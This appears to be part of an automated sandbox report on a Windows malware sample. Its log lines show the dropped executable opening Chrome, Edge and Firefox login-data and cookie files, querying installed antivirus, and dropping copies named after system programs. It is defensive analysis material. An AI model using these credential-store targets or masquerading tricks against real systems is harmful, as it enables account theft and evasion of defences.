Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
Source: Yara match File source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
Source: Yara match File source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED